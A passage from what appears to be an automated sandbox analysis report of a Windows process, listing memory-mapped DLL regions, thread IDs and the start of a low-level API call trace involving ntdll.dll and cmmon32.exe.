= "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1359 start_va = 0x73960000 end_va = 0x7396efff entry_point = 0x73960000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1360 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = 
mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1361 start_va = 0x739a0000 end_va = 0x739affff entry_point = 0x739a0000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1362 start_va = 0x739b0000 end_va = 0x73a43fff entry_point = 0x739b0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1363 start_va = 0x73a80000 end_va = 0x73a8cfff entry_point = 0x73a80000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1364 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1365 start_va = 0x73ba0000 end_va = 0x73bcefff entry_point = 0x73ba0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1366 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1367 start_va = 0x73bf0000 end_va = 0x73c28fff entry_point = 0x73bf0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1368 start_va = 0x73c30000 end_va = 0x73c38fff entry_point = 0x73c30000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1369 
start_va = 0x73c40000 end_va = 0x73c77fff entry_point = 0x73c40000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1370 start_va = 0x73c80000 end_va = 0x73caefff entry_point = 0x73c80000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1371 start_va = 0x73cb0000 end_va = 0x73d61fff entry_point = 0x73cb0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 1372 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1373 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1374 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1375 start_va = 0x74040000 end_va = 0x74051fff entry_point = 0x74040000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1376 start_va = 0x74060000 end_va = 0x7407dfff entry_point = 0x74060000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1377 start_va = 
0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1378 start_va = 0x74220000 end_va = 0x74317fff entry_point = 0x74220000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 1379 start_va = 0x74320000 end_va = 0x744d6fff entry_point = 0x74320000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1380 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1381 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1382 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1383 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1384 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1385 
start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1386 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1387 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1388 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1389 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1390 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1391 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1392 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1393 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" 
(normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1394 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1395 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1396 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1397 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1398 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1399 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1400 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1401 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1402 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = 
mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1403 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1404 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1405 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1406 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1407 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1408 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1409 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1410 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1411 start_va = 0x76850000 end_va = 0x768ecfff 
entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1412 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1413 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1414 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1415 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1416 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1417 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1418 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1419 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: 
id = 1420 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1421 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1422 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1423 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1424 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1425 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1426 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1427 start_va = 0x7ff9c000 end_va = 0x7ff9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9c000" filename = "" Region: id = 1428 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 1429 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 1430 start_va = 
0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 1431 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 1432 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1433 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1434 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1435 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1436 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1437 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1438 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1439 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1440 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1441 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1442 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1443 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 
region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1444 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1445 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1446 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1448 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1449 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1450 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1451 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1452 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1454 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1455 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1456 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdb000" filename = "" Region: id = 1457 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1458 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1459 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1460 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1541 start_va = 0x2230000 end_va = 0x2231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 1542 start_va = 0x61c10000 end_va = 0x61d29fff entry_point = 0x61c10000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 1543 start_va = 0x6f190000 end_va = 0x6f1a9fff entry_point = 0x6f190000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1544 start_va = 0x6f250000 end_va = 0x6f25efff entry_point = 0x6f250000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1709 start_va = 0x61b00000 end_va = 0x61c05fff entry_point = 0x61b00000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 1710 start_va = 0x6cf60000 end_va = 0x6cf94fff entry_point = 0x6cf60000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1711 start_va = 0x6ead0000 
end_va = 0x6eae1fff entry_point = 0x6ead0000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 1712 start_va = 0x22b0000 end_va = 0x22b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022b0000" filename = "" Region: id = 1713 start_va = 0x6e8a0000 end_va = 0x6e8a8fff entry_point = 0x6e8a0000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1714 start_va = 0x22c0000 end_va = 0x22c4fff entry_point = 0x22c0000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 1715 start_va = 0x63a0000 end_va = 0x6536fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000063a0000" filename = "" Region: id = 1716 start_va = 0x6840000 end_va = 0x7203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006840000" filename = "" Region: id = 1717 start_va = 0x22d0000 end_va = 0x22d3fff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 1718 start_va = 0x3710000 end_va = 0x384bfff entry_point = 0x3710000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1719 start_va = 0x3990000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 1720 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1721 start_va = 0x7ff9b000 end_va = 0x7ff9bfff 
entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1722 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1723 start_va = 0x2390000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1724 start_va = 0x73280000 end_va = 0x732b7fff entry_point = 0x73280000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1725 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1726 start_va = 0x22e0000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1727 start_va = 0x6f010000 end_va = 0x6f015fff entry_point = 0x6f010000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1728 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1856 start_va = 0x2240000 end_va = 0x2242fff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 1857 start_va = 0x72160000 end_va = 0x72175fff entry_point = 0x72160000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Thread: id = 66 os_tid = 0xaa4 Thread: id = 67 os_tid = 0x9d8 Thread: id = 68 
os_tid = 0x9c8 Thread: id = 69 os_tid = 0x64 Thread: id = 70 os_tid = 0x548 Thread: id = 71 os_tid = 0x66c Thread: id = 72 os_tid = 0x5c8 Thread: id = 73 os_tid = 0x664 Thread: id = 74 os_tid = 0x778 Thread: id = 75 os_tid = 0x674 Thread: id = 76 os_tid = 0x18c Thread: id = 77 os_tid = 0x120 Thread: id = 78 os_tid = 0x7e8 Thread: id = 79 os_tid = 0x418 Thread: id = 80 os_tid = 0x160 Thread: id = 81 os_tid = 0x144 Thread: id = 82 os_tid = 0x76c Thread: id = 83 os_tid = 0x760 Thread: id = 84 os_tid = 0x730 Thread: id = 85 os_tid = 0x72c Thread: id = 86 os_tid = 0x728 Thread: id = 87 os_tid = 0x724 Thread: id = 88 os_tid = 0x720 Thread: id = 89 os_tid = 0x714 Thread: id = 90 os_tid = 0x70c Thread: id = 91 os_tid = 0x704 Thread: id = 92 os_tid = 0x6f8 Thread: id = 93 os_tid = 0x644 Thread: id = 94 os_tid = 0x640 Thread: id = 95 os_tid = 0x638 Thread: id = 96 os_tid = 0x634 Thread: id = 97 os_tid = 0x630 Thread: id = 98 os_tid = 0x61c Thread: id = 99 os_tid = 0x614 [0067.310] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1af77c | out: HeapArray=0x1af77c*=0x1f0000) returned 0xf [0067.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1af2d8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0067.317] NtCreateFile (in: FileHandle=0x1af2f8, DesiredAccess=0x120089, ObjectAttributes=0x1af2c0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af2e0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af2f8*=0x880, IoStatusBlock=0x1af2e0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0067.326] NtQueryInformationFile (in: FileHandle=0x880, IoStatusBlock=0x1af2e0, FileInformation=0x1af054, 
Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x1af2e0, FileInformation=0x1af054) returned 0x0 [0067.327] NtClose (Handle=0x880) returned 0x0 [0067.351] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\cmmon32.exe", NtPathName=0x1af514, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\cmmon32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0067.351] NtCreateFile (in: FileHandle=0x1af534, DesiredAccess=0x120089, ObjectAttributes=0x1af4fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\cmmon32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1af51c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1af534*=0x880, IoStatusBlock=0x1af51c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0067.395] NtQueryInformationFile (in: FileHandle=0x880, IoStatusBlock=0x1af51c, FileInformation=0x1af474, Length=0x18, FileInformationClass=0x5 | out: 